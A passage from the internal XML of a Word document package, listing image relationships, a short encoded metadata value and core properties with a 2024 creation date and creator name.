Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId1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nxCVnngJ04P008NlKQ50pD2Dbw==">CgMxLjA4AHIhMVp1dm5zU24tbElNNzdzWDRuQjBtbWhVcFFwMVVEQmJQ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2024-11-09T01:39:00Z</dcterms:created>
  <dc:creator>build ryuki</dc:creator>
</cp:coreProperties>
</file>